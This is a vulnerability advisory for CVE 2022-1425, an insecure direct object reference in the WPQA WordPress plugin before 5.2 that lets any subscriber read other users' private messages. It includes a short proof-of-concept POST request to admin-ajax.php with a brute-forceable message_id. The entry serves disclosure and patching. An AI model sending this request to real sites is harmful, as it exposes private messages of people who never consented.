WPQA < 5.2 – Subscriber+ Private Message Disclosure via IDOR | CVE 2022-1425 | Plugin Vulnerabilities

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the message_id of the wpqa_message_view ajax action belongs to the requesting user, leading to any user being able to read messages for any other users via a Insecure Direct Object Reference (IDOR) vulnerability.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: <valid cookie of any user>

action=wpqa_message_view&message_id=<numeric_id_can_be_bruteforced>

Affects Plugins

Fixed in 5.2

References

CVE

YouTube Video

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

b110e2f7-4aa3-47b5-a8f2-0a7fe53cc467

Timeline

Publicly Published

2022-04-21 (about 2 years ago)

Added

2022-04-21 (about 2 years ago)

Last Updated

2022-05-07 (about 2 years ago)

Other

Published

Title

Published

2024-03-20

Title

Plugin Permalink < 2.4.3.2 - Missing Authorization via get_uri_editor

Published

2021-09-22

Title

WP User Manager < 2.6.3 - Arbitrary User Password Reset to Account Compromise

Published

2023-12-06

Title

Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

Published

2023-01-30

Title

WP Private Message < 1.0.6 - Private Message Disclosure via IDOR

Published

2023-12-27

Title

WooPayments < 6.7.0 - Unauthenticated Order Deletion via IDOR